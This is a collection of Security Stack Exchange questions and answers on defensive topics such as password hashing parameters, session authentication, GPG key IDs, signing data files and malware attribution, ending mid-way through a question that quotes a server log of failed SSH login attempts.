109,709
I wanted to know if someone can log my keystrokes if I am on a virtual machine. Is it more secure to use a computer or a virtual machine on that computer?
RedGrittyBrick is right. Here's how it would work:

1. Keylogger is on the host machine: even VM sessions will be keylogged.
2. Keylogger is on the virtual machine: only the VM will be keylogged, unless it escapes the VM.
3. Keylogger is hardware-based: same as #1, everything can be captured, but this includes things even outside of the main operating system, as long as it's all going to the hardware. This means anything on your machine, including BIOS passwords, boot passwords, disk encryption, etc.
{ "source": [ "https://security.stackexchange.com/questions/109709", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92713/" ] }
109,806
I am writing a multiplayer game. I have a central server which processes everything. For data exchange I use the HTTPS protocol. Because this is a game I cannot use computationally expensive systems like RSA for data transfer.

To log in:
1. The client uses SHA-512 to produce a hexadecimal hash from the password and a random seed.
2. The client sends a "login" request with the username, hash and seed to the server.
3. The server checks that the user has not attempted too many login requests and checks whether the password hash matches the hash made from the password in the database. If it does, it sends an access_key and a response that login was successful.

To send requests which require login:
1. The client sends a hash generated from the access_key and seed along with the request data.
2. The server checks whether the IP has not changed and whether the hash made from the access_key and seed is correct. If it is, a new access_key is generated from the old one, the request data is processed, and the server returns the new access_key along with the response from the request.

At any time, if the client's IP changes or an invalid access_key is sent, the session is automatically terminated.

How secure is this approach? What can I do to improve it?
First off, crypto is hard, and you shouldn't create your own.

Vulnerabilities

Your login seems to suffer from a pass-the-hash vulnerability. An attacker doesn't need to crack the hash to log in; they can just pass the hash and will be logged in. This defeats the purpose of hashing the password in the first place. SHA-512 is not recommended for storing passwords, as it's way too fast. Use something like bcrypt instead.

HTTPS and Encryption

You say that RSA is too expensive. But generally, RSA is only used to exchange a key, which is then used with a much less expensive symmetric (private-key) cryptosystem. As you clarified that you do use HTTPS, it should be noted that you already use RSA: HTTPS uses RSA or Diffie-Hellman for key exchange and some block or stream cipher for the actual data encryption. Because you use HTTPS, you already have data confidentiality and integrity (and server authentication, and optionally client authentication), so there is no need for additional encryption at the application level.

Advantages of your scheme?

Your scheme doesn't really seem to serve any purpose. You are already secure from eavesdropping and data tampering via HTTPS (and your scheme wouldn't have prevented either anyway). So your scheme isn't really about data exchange so much as it is about authentication. Generally, authentication is handled like this:

Login:
1. The client sends the username and password (plain, over HTTPS).
2. The server hashes the password and compares the hash against the hash in the database.
3. The server sends a session id back.

Other requests:
1. The client sends the session id.
2. The server validates the session id.
3. (Optional) When session state changes, the server regenerates the session id.

Your approach is similar, but it introduces the pass-the-hash vulnerability and contains a seed, which seems unnecessary and thus only complicates the scheme. It also regenerates the session id on each request, which isn't really needed and only causes unnecessary overhead.
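A minimal sketch of that standard server-side flow, for illustration only: it assumes the jBCrypt library (org.mindrot.jbcrypt.BCrypt), and the method names are invented; any bcrypt or scrypt implementation would be used the same way.

```java
import java.security.SecureRandom;
import java.util.Base64;
import org.mindrot.jbcrypt.BCrypt;

public class AuthSketch {
    private final SecureRandom random = new SecureRandom();

    // Registration: store only the bcrypt hash, never the password or a fast hash of it.
    public String hashForStorage(String password) {
        return BCrypt.hashpw(password, BCrypt.gensalt(12)); // work factor 12 is a placeholder to tune
    }

    // Login: the plain password arrives over HTTPS, is checked against the stored hash,
    // and a random session id is handed back on success.
    public String login(String password, String storedHash) {
        if (!BCrypt.checkpw(password, storedHash)) {
            return null; // authentication failed
        }
        byte[] token = new byte[32];
        random.nextBytes(token);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(token);
    }
}
```

The session id is just an unguessable random value with no structure; there is nothing to derive or regenerate per request unless the session state changes.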
{ "source": [ "https://security.stackexchange.com/questions/109806", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96071/" ] }
109,821
I'm a Security Architect, and I'm used to defining the security of a project as a specification that gets carried out by others. I have been recently tasked with teaching new coders how to design and program using the principles of "Secure by Design" (and in the near future "Privacy by Design"). I have 30-45 minutes (yeah, I know), and the talk needs to be language-agnostic. This means I need to present actionable rules that can be applied by the web devs, application devs, and infrastructure devs. I came up with 5 Basic Rules and a Supplement:

1. Trust no internal/external input (covers sanitation, buffer overflows, etc.)
2. Least Privilege for any entity, object or user
3. Fail "no privilege"
4. Secure, even if design is known/public
5. Log so that someone unfamiliar with the system can audit every action

Supplement: If you violate a Rule, prove the mitigation can survive future programmers adding functionality.

Each of those rules can be augmented with examples from any language or application, for specific guidance. I believe this handles most of the general principles of "Secure by Design" from a high-level perspective. Have I missed anything?
The canonical resource for the concept of secure-by-design is "The Protection of Information in Computer Systems" by Saltzer and Schroeder. The essence is distilled into their 8 principles of secure design:

1. Economy of mechanism
2. Fail-safe defaults
3. Complete mediation
4. Open design
5. Separation of privilege
6. Least privilege
7. Least common mechanism
8. Psychological acceptability

These principles, laid out in 1974, are still fully applicable today.
{ "source": [ "https://security.stackexchange.com/questions/109821", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6253/" ] }
109,950
The internet is rife with 'authentication vs. authorization' -type questions. I'm not asking that here. I'm wondering if there is some overarching term that encompasses both of these. I've seen authentication referred to as 'identity management', and authorization referred to as 'access control'. But even AWS didn't have a good term for both of these together, so it created IAM. So again, if authentication is proving who (as a principal) you are, and authorization is about giving that authenticated principal access levels, then I'm looking for an umbrella security term that applies to both (hence, governing who can do what for a particular resource). Does this exist?!
According to the CISSP study guide, access control includes IAAA (Identification, Authentication, Authorization and Accountability). So if you don't care about the rest, you can refer to Authentication and Authorization together as access control. Where:

Identification: User_Name
Authentication: User_Name + Password (in one-factor auth, the simple case)
Authorization: Access to resources once authenticated
Accounting: Tracking who did what
{ "source": [ "https://security.stackexchange.com/questions/109950", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96249/" ] }
109,961
I quite often see opportunities to optimise server-side code if HTML form names are exactly the same as the database field names they eventually update. The drawback obviously is that this exposes information about the database structure in plain sight. Of course this information is only useful if other weaknesses exist, but it does seem like handing over information on a plate. I'd be interested to know if people think this is low risk and if they do expose field names like this without worrying.
It is very common to do this. As you've noticed, there is a significant benefit in keeping code simple. If you do have an SQL injection vulnerability, an attacker can figure out your database structure using INFORMATION_SCHEMA. So hiding your database structure doesn't help you a great deal. Another concern in this area is mass assignment vulnerabilities. Perhaps a user is allowed to update their user details - name, email, password, etc. But they are not supposed to be able to update the field "is_admin". With code that automatically routes form fields to SQL statements, sometimes vulnerabilities like this can appear.
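A common mitigation for the mass assignment case is to allow-list which form fields may ever reach the database. The sketch below is illustrative only; the field names are invented.

```java
import java.util.Map;
import java.util.Set;
import java.util.stream.Collectors;

public class FormFilter {
    // Only these form fields may ever be written to the user record.
    private static final Set<String> ALLOWED = Set.of("name", "email", "password");

    // Drop anything else (e.g. a smuggled "is_admin" field) before it reaches any SQL statement.
    public static Map<String, String> allowListed(Map<String, String> formFields) {
        return formFields.entrySet().stream()
                .filter(e -> ALLOWED.contains(e.getKey()))
                .collect(Collectors.toMap(Map.Entry::getKey, Map.Entry::getValue));
    }
}
```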
{ "source": [ "https://security.stackexchange.com/questions/109961", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92784/" ] }
110,084
I use PBKDF2 with SHA-256 to store hashes of passwords. I use the following parameters:

number of iterations desired = 1024
length of the salt in bytes = 16
length of the derived key in bytes = 4096

But recently I found out that most probably the parameters are badly selected. For example, the wiki page says "standard was written in 2000, the recommended minimum number of iterations was 1000 .... As of 2005 a Kerberos standard recommended 4096 iterations", which means that most probably I have to increase this number, and "The standard recommends a salt length of at least 64 bits", which means that my salt length is ok is too low (thanks to Neil Smithline). But when searching through the standard I was not able to find the mention of a recommended salt length.

When I looked for the length of the derived key I found this nice answer: "If you use PBKDF2 for password hashing, then 12 bytes of output ought to be fine, with a non-negligible security margin". It suggested to me that I chose too big a number, which probably does not make sense.

So my question is: can anyone show good parameters (maybe with some justifications/links) for this scenario of password hashing (as of 2016)? Also, can I guarantee that the derived key will always be the same length as I ask for?
Your starting point:

PBKDF2-HMAC-SHA-256
number of iterations desired = 1024
length of the salt in bytes = 16
length of the derived key in bytes = 4096

Algorithm

OK - PBKDF2-HMAC-SHA-256 is a solid choice, though if you're running on any modern 64-bit CPU, I would strongly recommend PBKDF2-HMAC-SHA-512 instead, because SHA-512 requires 64-bit operations that reduce the margin of a GPU-based attacker's advantage, since modern GPUs don't do 64-bit as well.

Salt

16 bytes of salt is fine, as long as it is cryptographically random and is unique per password. Normal recommendations are in the 12-24 byte range, with 16 considered quite solid.

Output and Iterations

4096 bytes of output is ACTIVELY BAD! SHA-256 has a native output size of 32 bytes. PBKDF2/RFC2898 states that in this case, you'll first run 1024 iterations to get the first (leftmost) 32 bytes, then another 1024 iterations for the next 32 bytes, and so on for 128 times in total to get the full 4096 bytes of output you requested. So, you did 131072 iterations total, and got 4096 bytes of output.

The attacker is going to do 1024 iterations total, and compare their 32 bytes of output to the first (leftmost) 32 bytes of your output - if those are the same, they guessed correctly! You just gave every attacker a 128:1 advantage!

Instead, if you're happy with the speed, you should do 131072 iterations with 32 bytes of output - you will spend the SAME amount of time you are now (so it's free!), and your attackers will need to spend 128 times more time than they do now!

NOTE: If you move to PBKDF2-HMAC-SHA-512, you can use up to 64 bytes of output, and each iteration will take slightly longer.

Never get more output for password hashing than the native output of your hash function, i.e. 20 bytes for SHA-1, 32 for SHA-256, 64 for SHA-512. You can optionally store less, but it doesn't save you any computations. I would recommend storing at least 28 bytes of output (224 bits, which is twice 112 bits, the nominal security of 3DES).

Note that output length values are pure binary output - BEFORE you BASE64 or hexify them, if you do (personally, I'd store the raw binary - it uses less space, and requires one less conversion).
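To make the corrected parameters concrete, here is a minimal sketch using the JDK's built-in PBKDF2 support. The iteration count and output length follow the reasoning above, but treat the exact figures as placeholders to benchmark on your own hardware.

```java
import java.security.SecureRandom;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class Pbkdf2Sketch {
    public static byte[] hashPassword(char[] password) throws Exception {
        byte[] salt = new byte[16];                // 16-byte random salt, unique per password
        new SecureRandom().nextBytes(salt);

        int iterations = 131_072;                  // spend the work on iterations...
        int outputBits = 64 * 8;                   // ...and request only the native output size (64 bytes for SHA-512)

        PBEKeySpec spec = new PBEKeySpec(password, salt, iterations, outputBits);
        SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA512");
        return factory.generateSecret(spec).getEncoded(); // store salt, iteration count and this output together
    }
}
```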
{ "source": [ "https://security.stackexchange.com/questions/110084", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15912/" ] }
110,089
I have a question regarding encryption. Say an attacker stole my entire database, and in that database all the data was encrypted. If the attacker took one piece of encrypted data and for some reason knew the original value of that one piece of encrypted data, could he use that knowledge to work out a way to decrypt all the other data efficiently?
When used correctly, no. This is one of the tests for semantic security, in fact. In another form, if an attacker can choose a plaintext to be encrypted by you, with your secret key, he should not be able to learn anything about any other data you have encrypted with the same key. This is what is known as CPA-secure (chosen plaintext attack) and AES is believed to be (as far as we can tell) CPA-secure. So not only can an attacker not decrypt other data using this knowledge, he can't even learn anything about the other data with this knowledge.
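"Used correctly" means, among other things, an authenticated mode with a fresh random nonce for every message. As a rough sketch using the JDK's AES-GCM support (key management, nonce storage and decryption are omitted):

```java
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class GcmSketch {
    // Encrypts one record; a new random 12-byte nonce is used every time,
    // so even identical plaintexts produce unrelated-looking ciphertexts.
    public static byte[][] encrypt(byte[] key, byte[] plaintext) throws Exception {
        byte[] nonce = new byte[12];
        new SecureRandom().nextBytes(nonce);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"),
                    new GCMParameterSpec(128, nonce));
        return new byte[][] { nonce, cipher.doFinal(plaintext) }; // keep the nonce next to the ciphertext
    }
}
```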
{ "source": [ "https://security.stackexchange.com/questions/110089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78210/" ] }
110,139
I generated a public key using GnuPG. I can see it using --list-keys:

$ gpg --list-keys
/Users/mertnuhoglu/.gnupg/pubring.gpg
-------------------------------------
pub   4096R/CB3AF6E6 2015-12-24 [expires: 2016-12-23]
uid                  Mert Nuhoglu <[email protected]>
sub   4096R/0D6B756F 2015-12-24 [expires: 2016-12-23]

I want to share it on keyservers. This tutorial says I need to use the following command:

gpg --send-keys 'Your Name' --keyserver hkp://subkeys.pgp.net

I use that command, but I get the following error:

$ gpg --send-keys 'Mert Nuhoglu' --keyserver hkp://subkeys.pgp.net
gpg: "Mert Nuhoglu" not a key ID: skipping
gpg: "--keyserver" not a key ID: skipping
gpg: "hkp://subkeys.pgp.net" not a key ID: skipping

What is a key ID exactly?
OpenPGP User IDs

User IDs in OpenPGP are used to connect keys to entities like names and e-mail addresses. These are used to search for keys on key servers, and to match them to users/e-mail addresses. Be aware user IDs are not checked by key servers; make sure to verify them on your own!

OpenPGP Key IDs

OpenPGP key IDs (and fingerprints) are used to reference keys when performing several actions like requesting and sending keys, or when verifying ownership. For example, you'd exchange the fingerprint with the key's owner on a separate, trusted channel to make sure the key really belongs to the person that claims to own the key.

The OpenPGP (v4) key ID is an identifier calculated from the public key and key creation timestamp. From those, a hashsum is calculated. The hex-encoded version is called the fingerprint of the key. The last (lower-order) 16 characters are called the long key ID; if you only take the last eight characters, it's the short key ID. An example for my own public key:

fingerprint: 0D69 E11F 12BD BA07 7B37 26AB 4E1F 799A A4FF 2279
long id:     4E1F 799A A4FF 2279
short id:    A4FF 2279

The primary public key's ID is referenced in the pub line after the key size; in your case the short key ID is CB3AF6E6:

pub 4096R/CB3AF6E6 2015-12-24 [expires: 2016-12-23]

Be aware the short key IDs (only eight hex characters, i.e. 32 bits) do not provide a sufficiently large value space, and it is easily possible to generate duplicate keys through collision attacks. Instead of short key IDs, use at least long key IDs, and when software handles keys, always refer to the whole fingerprint. For more details on how the hash sums are derived, I refer to RFC 4880, OpenPGP, 12.2. Key IDs and Fingerprints, which also explains the differences for deprecated OpenPGP v3 keys.

Sending and Receiving Keys From Key Servers

To send or receive keys from key servers, you must use the full key ID or fingerprint. GnuPG does not accept user IDs here. From man gpg:

--send-keys key IDs
Similar to --export but sends the keys to a keyserver. Fingerprints may be used instead of key IDs. [...]

--recv-keys key IDs
Import the keys with the given key IDs from a keyserver. [...]

If you want to search for a user ID (or parts of one) first, use gpg --search-keys. This will first query the key servers for the name, and provide some kind of assistant that asks you which keys to fetch afterwards (so, it will automatically run --recv-keys for the selected keys).

--search-keys names
Search the keyserver for the given names. Multiple names given here will be joined together to create the search string for the keyserver. [...]
{ "source": [ "https://security.stackexchange.com/questions/110139", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96428/" ] }
110,141
Is it possible to know whether a textfile, e.g. in XML format, has been edited or tampered with over time? The context to my question follows: I am a scientist in industry using a technology called 'mass spectrometry (MS)'. MS is an analytical technique used, e.g. in forensic analysis to determine whether a particular compound is present in a sample (e.g. drug of abuse in blood or urine). Mass spec. datafiles are usually stored in flat-file format to the instrument vendor's private binary specification - their software can process it, but nothing else can. However, open standards for MS data exist, and most vendors support export to at least one open specification. These open standards are mainly XML based these days (eg mzML ) and allow processing with open source applications, and also allow long-term storage (> 10 years) of the data in a format that doesn't require that we maintain an archived computer and the OS (or VM) and the processing software for long periods. The vendor binary format provides at least some security against data tampering, however the XML formats do not. Hence the issue - the open formats are very useful for providing access to data over archival timescales, but security is a problem.
The default solution would be to use cryptographic signatures. Have every technician generate a PGP keypair, publishing the public key and keeping the private key secure.

When a technician makes an analysis, they sign the result file with their private key. Now anyone who wants to verify the file can check the signature using the public key of the technician. When anyone changes the file, the signature won't be correct anymore.

Security consideration: Should any private key of a technician get known to someone else, that person can change the files and also change the signature to one which will be valid. This problem can be mitigated by having multiple persons sign each result file. An attacker would require all keys to replace all signatures with valid ones.

Alternative low-tech solution: Print out each result file, have the technician sign it the old-school way (with a pen) and deposit the file in a physically secure archive.

By the way: Do not assume that the vendor-specific binary format provides any more security against tampering than XML does. Just because you can't read and edit it when you open it with a text editor doesn't mean nobody else can reverse-engineer the format and build an editor for it.
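If you later want to automate the signature checks in your own archival tooling rather than relying on PGP software alone, the underlying idea can be sketched with the JDK's java.security API. Key management, which is the genuinely hard part, is omitted here, and the file name is hypothetical.

```java
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;

public class SignSketch {
    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(3072);
        KeyPair pair = gen.generateKeyPair();      // in practice: generated once per technician, private key kept secure

        byte[] data = Files.readAllBytes(Paths.get("result.mzML")); // hypothetical result file

        Signature signer = Signature.getInstance("SHA256withRSA");
        signer.initSign(pair.getPrivate());
        signer.update(data);
        byte[] sig = signer.sign();                // archived next to the data file

        Signature verifier = Signature.getInstance("SHA256withRSA");
        verifier.initVerify(pair.getPublic());
        verifier.update(data);
        System.out.println("Signature valid: " + verifier.verify(sig)); // false if the file was edited
    }
}
```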
{ "source": [ "https://security.stackexchange.com/questions/110141", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96430/" ] }
110,172
I'm taking a course which is designed with the CISSP certification in mind. Though the class is categorized as software engineering, we talked a lot about physical security and, in particular, floods, fires, earthquakes and cars running into things. How is this security? For example, we were told that data centres are safest in the middle of a building, because if the roof were leaking the top wouldn't be safe, and water tends to go down so the lower floors would be the first to flood. Is this really a security issue? For example, if the roof leaks the engineer would be at fault, not the security analyst. You wouldn't hire a security analyst to make sure the roof is solid.

UPDATE: Also, things like having bollards around a building to protect pedestrians from cars, how is this security? No one's really explained this yet. I was told the company's most valuable assets are their employees, but with this line of reasoning, what isn't security? If availability is so encompassing, what isn't part of security?
All other answers are fine. I'm going to offer you a classic security perspective.

Starting a fire/flood is a textbook scenario for physical penetration/exfiltration. People under stress are less likely to challenge strangers. A fire can be used to destroy forensic evidence, in particular when there's insider involvement.

An earthquake or, indeed, any natural disaster (like bush fires) is a potential complication for security because law and order break down and looting rears its ugly head.

Perimeter security against SVBIEDs is a necessary consideration in certain countries and threat environments. If a suicide car bomber can drive close to the walls of your data center, it is your failure as a security consultant. Hence bollards, flowerbeds, and concrete barriers.

Security is a holistic discipline. Every specialist cares about bits and pieces of the enterprise, and by necessity of life loses sight of the whole. There should be at least one person out there who thinks in terms of adversary's behavior and not his/her own pigeonhole. Which, incidentally, is a security consultant's job description.
{ "source": [ "https://security.stackexchange.com/questions/110172", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10714/" ] }
110,258
I work for a help desk, and we recently launched an online service where our members can log in. A problem we are having is that users who call us often ask us to confirm that the password handed to them is correct. By doing so, they disclose their password over the phone. How can we prevent this? It is mentioned in the sign-up mail that they mustn't disclose their password, and we mention it whenever we feel they are going to disclose it to us.

About the users:
- Around 90% of our callers are first-time callers. Since they're doing it the first time they call, it's difficult to educate them.
- They are pensioners, so they usually have less experience of authenticated services than the average computer user.
Ensure there is a method for users to reset their own passwords, and make a policy whereby the helpdesk will initiate a password reset if a password is revealed to them. Users will tend to phone up when they can't log in, and therefore triggering the same password reset process as they can themselves results in them slowly learning that it doesn't help to phone up.
{ "source": [ "https://security.stackexchange.com/questions/110258", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89900/" ] }
110,357
Can my password have more than one password combination? I read up on physical combination locks (the lock you open with numbers) and I learned that a combination lock can have more than one possible combination. Also, I had my first phone, a normal Nokia phone (not a smartphone), that was password protected, and I was able to open the device with a password that was not really the exact password for the phone. Like, if the password was set to 4545 and I typed 1111 the phone still unlocked. Or if the phone password was set to 4114 and I typed, let's say, 2141, the phone still unlocked. The question is, if my password for my laptop PC was !78ghA,NJ58*#3&*, is it possible that another combination will work behind my back, or will it work only if there is a vulnerability?
In most password-protected systems it usually is possible, but very unlikely. Behind many password validation mechanisms is the use of salted hash functions. For the sake of simplicity, let's forget about the salt for a moment.

- When a user sets their password, hash(password) is stored in the database.
- When the user logs in presenting password', hash(password') is compared to hash(password). If it matches, the user is allowed to log in.

Let's remember, however, that hash functions take data of unlimited length and transform it into data of limited size, e.g. 128 bits. Therefore, it is not hard to understand that there can be more than one message that produces the same hash from a given function. That is called a collision, and it is what you are concerned about. The thing is that hash functions are designed to be so random that you should not find or produce a collision easily. It is theoretically "possible", but practically "impossible", if you are using a good modern hash function.
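For illustration only, the mechanism described above looks roughly like the sketch below (no salt, and a fast hash that real systems should not use for password storage):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Arrays;

public class HashCheckSketch {
    static byte[] hash(String password) throws Exception {
        return MessageDigest.getInstance("SHA-256")
                            .digest(password.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) throws Exception {
        byte[] stored = hash("correct horse battery staple"); // stored when the password is set
        // A different password only unlocks the account if it collides with the stored hash,
        // which is theoretically possible but practically never happens with a good hash function.
        System.out.println(Arrays.equals(stored, hash("correct horse battery staple"))); // true
        System.out.println(Arrays.equals(stored, hash("tr0ub4dor&3")));                  // false
    }
}
```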
{ "source": [ "https://security.stackexchange.com/questions/110357", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94833/" ] }
110,379
Let's say that in the password policy the password history is defined to remember the last 10 passwords. I understand password history exists so that if a password is recovered from a compromised database by some attacker, chances are way less likely that the password is actually the user's current password. However, if upon a periodic password reset the user simply appends '1' to their old password, and on the next periodic reset they append, let's say, '2', this greatly decreases the effectiveness of periodic password resets. As soon as the attacker recovers two old passwords of the same user in clear text, he will see the pattern and can guess the actual current password of the user...

The best practice is to hash (+ salt) passwords, however as far as I can see this makes it impossible to check whether the user simply appended a single digit to their old password or not. The passwords could be encrypted instead of hashed, which would address my concern, however I don't like the idea of passwords being reversible to plain text without brute-force attacks.

I am wondering what the best solution would be to prevent users from making these minor changes to their old password when resetting it. Can it be technically achieved in a very secure manner, or does this definitely require user awareness?
You can't. Your users are doing this because the reset mechanism has become obtrusive to them getting work done. People are clever enough to get around any of the mechanisms you're going to devise. Those that aren't will quickly learn from those that are. Information like this travels fast.

If you somehow were to figure out how to counter the password1 password2 password3 scheme that people commonly use, you'll almost instantly be confronted with a new scheme: 1password 2password 3password. Now you see a NEW pattern, and simply iterate all numbers. So the user comes up with a yet better scheme: passwordA passwordB passwordC. You'll spend weeks coming up with a counter-measure, only to be defeated in 10 minutes by a clever person who thought of something you didn't.

The point being that the users' ability, and the low cost to them, to get past your counter-measures far outweighs your ability to continually develop new schemes to try to prevent them.

The solution is simply to stop seeing your users as adversaries who you're trying to defeat. They aren't. Users are simply trying to get things done, and you've put up a barrier to doing so. If this really bothers you so much, you need to adjust your attitude towards the users and work with them to come up with something that suits BOTH your needs, and doesn't create an adversarial relationship.
{ "source": [ "https://security.stackexchange.com/questions/110379", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25125/" ] }
110,415
I understand why the password should be salted and hashed before being saved into the database, but my question is whether it needs to be hashed on the browser side too, or whether just sending the plain-text password over HTTPS is considered secure. If it is ok, is there any document which I can use to prove to my client that the system is secure? If it's not, what are the best practices?
It is standard practice to send "plaintext" passwords over HTTPS. The passwords are ultimately not plaintext, since the client-server communication is encrypted as per TLS. Encrypting the password before sending it in HTTPS doesn't accomplish much: if the attacker got their hands on the encrypted password they could simply use it as if it were the actual password, the server wouldn't know the difference. The only advantage it would provide is protecting users that use the same password for multiple sites, but it wouldn't make your site any safer.
{ "source": [ "https://security.stackexchange.com/questions/110415", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96738/" ] }
110,493
A design pattern I've noticed on internet banking sites is that you get automatically logged out and sent to a warning page if/when you hit the back button on your browser, ending your session and obliging you to log in again. I'm presuming this is due to some sort of security consideration, but I'm at a loss to figure out what. What is the rationale for this behaviour?
A scenario such banks might want to protect you from could be this:

1. You visit your banking website and do your banking stuff.
2. After you are finished, you log out and then navigate to some other website to look at cat pictures or whatever.
3. You leave your computer with the cat picture website open. Because there is nothing incriminating on your screen, you feel safe doing that.
4. Your evil roommate comes along and presses the back button a few times. They arrive at the cached version of your banking site, see your bank account and see that you still haven't paid your share of the rent even though you clearly have enough money to do that.

That's one reason why banking websites do not work when you navigate to them using the browser's back button.

But an even more likely reason could be laziness on the side of the web developers. Allowing the user to use back and forward navigation creates an additional variable in a web application which needs to be kept in mind at all times. Simply making this impossible removes that variable and makes it far easier for the developers to create a secure and bug-free application. Because bugs in banking applications can cause quite a lot of financial damage, developers in that sector are rather conservative and tend to limit usability when it results in a more predictable application use-pattern.
{ "source": [ "https://security.stackexchange.com/questions/110493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21695/" ] }
110,600
When a new piece of malware appears, people can try to determine where it comes from, and who its authors could be. How do security experts attempt to identify the authors of a new publicly disclosed piece of malware? What techniques (e.g. reverse engineering) are available?
There are a number of different techniques, depending on the skill level of the malware author:

- Embedded metadata - compiled programs can contain details about their authors. This is most commonly seen in legitimate programs, and shows in the details screen if you look in Windows properties. Attackers who are out for fame might well put identifying details in these fields.
- Accidental embedding - compilers will often include details on compiler flags used, which may well include paths to source files. If the source file was in /users/evilbob/malware, you can make a pretty good guess that evil bob wrote it. There are ways to turn off these inclusions, but everyone makes mistakes sometimes.
- Common code - malware authors are like any other programmer, and will reuse useful bits of code from previous work. It is sometimes possible to spot that a section of compiled code matches a previously discovered section of code so closely that it seems probable that the same source code was used for each. If that is the case, you can deduce that the second author had access to the code from the first, or may be the same person.
- Common toolchain - if a developer tends to use Visual Studio, it would be unexpected to see their code turning up compiled with GCC. If they use a specific packer, it would be strange to see them using a different packer. It's not perfect, but it could suggest a distinction.
- Common techniques - similar to the above, coders often have specific patterns of coding. People are unlikely to switch patterns, so you can make a reasonable guess that if some compiled code couldn't have been generated in a particular coding style, it probably wasn't written by someone who has previously been known to use a different style. This is much easier with interpreted languages, as seeing consistent use of, say, for loops rather than while loops is easier than spotting the differences between the compiled output of each (modern compilers may well reduce them to exactly the same set of instructions).
- Malware origin - where did it come from? Does it have any text in specific languages, or typos which suggest a particular background? (e.g. colour would suggest that the author wasn't American, generale might suggest someone used to writing in a Romance language such as French or Italian)

None of these are on their own enough to determine an author, but combined, they might suggest a common author with previous malware, or even with other known code (e.g. from OS projects).
{ "source": [ "https://security.stackexchange.com/questions/110600", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96683/" ] }
110,676
I am a manager in an office where the company does not provide a company email, so I use my personal email. Often, I will receive job lists by email from my general manager. How should I log in to my email in front of my co-workers so that they don't see my password? My email service uses end-to-end encryption, which means that it does not store or reset my password. I also cannot move the screen so that my co-workers cannot see it.
Use the blanket of security, as seen in the Snowden documentary Citizenfour. It involves placing a blanket over your head, the keyboard and monitor and typing in the password. It will look weird but for security's sake it may be worth it. Related post with demo pic - In CitizenFour, what was Edward Snowden mitigating with a head blanket?
{ "source": [ "https://security.stackexchange.com/questions/110676", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96987/" ] }
110,706
When checking the auth log of a server with the command: grep sshd.\*Failed /var/log/auth.log | less I see thousands of lines like this: Jan 12 11:27:10 ubuntu-leno1 sshd[8423]: Failed password for invalid user admins from 172.25.1.1 port 44216 ssh2 Jan 12 11:27:13 ubuntu-leno1 sshd[8425]: Failed password for invalid user phoenix from 172.25.1.1 port 20532 ssh2 Jan 12 11:27:17 ubuntu-leno1 sshd[8428]: Failed password for invalid user piglet from 172.25.1.1 port 24492 ssh2 Jan 12 11:27:22 ubuntu-leno1 sshd[8430]: Failed password for invalid user rainbow from 172.25.1.1 port 46591 ssh2 Jan 12 11:27:25 ubuntu-leno1 sshd[8432]: Failed password for invalid user runner from 172.25.1.1 port 57129 ssh2 Jan 12 11:27:34 ubuntu-leno1 sshd[8434]: Failed password for invalid user sam from 172.25.1.1 port 11960 ssh2 Jan 12 11:27:37 ubuntu-leno1 sshd[8437]: Failed password for invalid user abc123 from 172.25.1.1 port 5921 ssh2 Jan 12 11:27:40 ubuntu-leno1 sshd[8439]: Failed password for invalid user passwd from 172.25.1.1 port 21208 ssh2 Jan 12 11:27:43 ubuntu-leno1 sshd[8441]: Failed password for invalid user newpass from 172.25.1.1 port 65416 ssh2 Jan 12 11:27:46 ubuntu-leno1 sshd[8445]: Failed password for invalid user newpass from 172.25.1.1 port 26332 ssh2 Jan 12 11:27:49 ubuntu-leno1 sshd[8447]: Failed password for invalid user notused from 172.25.1.1 port 51126 ssh2 Jan 12 11:27:52 ubuntu-leno1 sshd[8449]: Failed password for invalid user Hockey from 172.25.1.1 port 14949 ssh2 Jan 12 11:27:56 ubuntu-leno1 sshd[8451]: Failed password for invalid user internet from 172.25.1.1 port 35105 ssh2 Jan 12 11:27:59 ubuntu-leno1 sshd[8453]: Failed password for invalid user asshole from 172.25.1.1 port 7916 ssh2 Jan 12 11:28:02 ubuntu-leno1 sshd[8456]: Failed password for invalid user Maddock from 172.25.1.1 port 26431 ssh2 Jan 12 11:28:05 ubuntu-leno1 sshd[8458]: Failed password for invalid user Maddock from 172.25.1.1 port 53406 ssh2 Jan 12 11:28:09 ubuntu-leno1 sshd[8460]: Failed password for invalid user computer from 172.25.1.1 port 23350 ssh2 Jan 12 11:28:15 ubuntu-leno1 sshd[8462]: Failed password for invalid user Mickey from 172.25.1.1 port 37232 ssh2 Jan 12 11:28:19 ubuntu-leno1 sshd[8465]: Failed password for invalid user qwerty from 172.25.1.1 port 16474 ssh2 Jan 12 11:28:22 ubuntu-leno1 sshd[8467]: Failed password for invalid user fiction from 172.25.1.1 port 29600 ssh2 Jan 12 11:28:26 ubuntu-leno1 sshd[8469]: Failed password for invalid user orange from 172.25.1.1 port 44845 ssh2 Jan 12 11:28:30 ubuntu-leno1 sshd[8471]: Failed password for invalid user tigger from 172.25.1.1 port 12038 ssh2 Jan 12 